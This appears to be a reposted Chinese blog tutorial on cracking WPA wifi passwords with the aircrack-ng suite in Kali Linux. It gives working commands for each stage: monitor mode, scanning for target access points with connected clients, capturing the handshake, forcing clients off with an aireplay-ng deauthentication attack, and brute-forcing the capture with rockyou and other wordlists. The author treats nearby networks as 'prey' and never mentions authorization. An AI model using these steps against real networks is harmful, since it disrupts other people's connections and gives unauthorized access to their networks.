admin管理员组文章数量:1603654
网卡的选择
怎么说呢…网卡选择的话…网上有推荐的
如果只是测试的话,平常的网卡就可以,但如果你要专门…可以参考一下这个连接
aircrack支持网卡
这篇博客讲了aircrack支持的网卡类型,其实aircrack官网也有…就是我忘记网址了…
aircrack使用
当然装备再好不会用也白搭
进入kali之后
首先是常用的两句话,最好每次使用前主动输入,防止出现一些bug
service NetworkManager stop
airmon-ng check kill//关闭networkmanager和影响airmon-ng的进程,不过可能数量和我图上的不一样,(因为我之前杀过一次)
然后再把网卡插上虚拟机
ifconfig
输入ifconfig后发现并没有找到我们的wlan0,因为我们关闭了networkmanager所以网卡不会自动启用,输入
ifconfig -a
可以看到我们的wlan0,不过不一定叫wlan0,也可能是wlan1,当然本次实验就以wlan0为例(这跟你插入网卡数量有关)
启用网卡并置为monitor模式
airmon-ng start wlan0
启用网卡为monitor模式,然后再输入ifconfig可以看到有个wlan0mon的设备,接下来就可以来干活了
monitor模式的网卡可以监听也可以发包
airodump-ng wlan0mon
开始监听周围的ap
扫描不到周围的ap
很多时候会出现你的网卡扫描不到周围的ap,这个时候有以下几种解决的方法
重新插入网卡,并且注意是否停止了networkmanager和airmon-check kill
网卡先插入主机然后再把网卡连接回虚拟机,有必要的话可以在主机上先连个wifi然后在把网卡连接上虚拟机
或者是你的网卡有问题
如果正常的话会出现下图的结果
可以看到被分成了两部分,上面一部分对应着ap,下面一部分对应着是station(客户机),下面分别介绍一下里面一些需要关注的东西
ap
bssid是指ap的mac地址
pwr是强度,均为负值,约靠近0说明信号越好,-1是错误的信号,大于-50都是强度不错的,然后-50~-75还是能用…剩下的就算了
beacons 发送的广播数量
#Data, 传递的数据包数量
CH1是当前网卡处以的信道,因为每个ap都会像固定的几个信道发出信号,所以默认情况下我们的网卡是会自动跳转信道,收集每个信道的ap
ENC 方式,通讯加密技术 有wps,wpa1,wpa2
ESSID wifi的名称,就是我们每天看到的wifi名
station
bssid对应的是他们建立关系的ap地址,not associated表明没有建立联系,断网了,而有mac地址说明他们建立了关系
station就是客户端的mac地址
另外可以注意probes里面的信息,因为客户机断线以后,他会跟傻子一样像周围发出信号,比如说他之前和wifi建立过关系,他会一直发包问:“wifi,你在哪,我要上网",然后probe里面就会出现wifi,这时候就可以利用另一种伪造ap的方式攻击客户机,这也是一种攻击方式
下面开始寻找我们的猎物
airodump-ng --bssid 21:2C:B2:23:46:40 wlan0mon
–bssid 就是指定对应的wifi的mac地址,也就是我们要攻击的ap
一般攻击的原则是这个ap下面要有客户机,所以第一步我们要做的就是去寻找那些有客户机的ap,因为如果不单独指定的话会出现大量的ap,你就不知道哪个下面是有客户机的
这个就没有,再换一个
下面这个就是我们合适的猎物
然后搞之前先简要讲解一下原理
为什么我们可以破解密码
原理是这样的
我们去监听ap的时候,如果这个ap下有用户,我们可以主动发包打断ap与用户的连接,但由于用户和ap都会默认自动连接,我们就可以通过airmon-ng的监听获取到握手的信息,然后再通过字典暴力破解握手信息,就可以得到对应的wifi密码
找到猎物之后先ctrl+c结束掉, 重新监听(因为我们需要讲握手的信息保存到文件中,然后之后暴力破解)
airodump-ng --ivs --bssid FC:D7:33:3F:BC:F8 –w test-c 11 wlan0mon
-c指定信道,对应ap的信道,这样有利于我们找到他,如果不指定信道1的话,我们的wifi还是会不停的切换信道,就会影响到之后我们发包打掉连接,因为攻击的时候需要保证ap和网卡在一个信道,不然我们的网卡无法发包打掉连接
-w 保存的文件名
–ivs只抓取可用于破解的IVS数据报文
然后新开一个console,用我们的大杀器打掉station
aireplay-ng -0 6 -a 11:C5:6E:F2:B5:73 -c 40:5B:D7:C6:6D:05 wlan0mon
-0是攻击模式,这里是打掉连接攻击
6是发6个包,打6次
-a 指定攻击的ap目标
-c 指定受害的station地址
wlan0mon就是我们的网卡
等一下就可以看到右上角出现了一个wpa handshaker就说明我们成功了
然后ctrl+c停掉
可以看到在当前目录下有个叫test-01.ivs的文件(如果捕获多次可能是02什么的)
然后就可以结合字典进行破解
默认kali自带了许多字典文件
在/usr/share/wordlists下面,这里我们使用一个小字典先试试
/usr/share/wordlists/fern-wifi/common.txt
aircrack-ng -w /usr/share/wordlists/fern-wifi/common.txt test-03.ivs
意识还不错,小字典没炸出来
换上大字典
/usr/share/wordlists/rockyou.txt
aircrack-ng -w /usr/share/wordlists/rockyou.txt test-02.ivs
需要40多分钟,让他自己慢慢破解去吧
成功了就会返回
版权声明:本文标题:无线渗透实战(1)--aircrack破解wifi密码 内容由热心网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:https://www.elefans.com/dianzi/1727035746a1095035.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论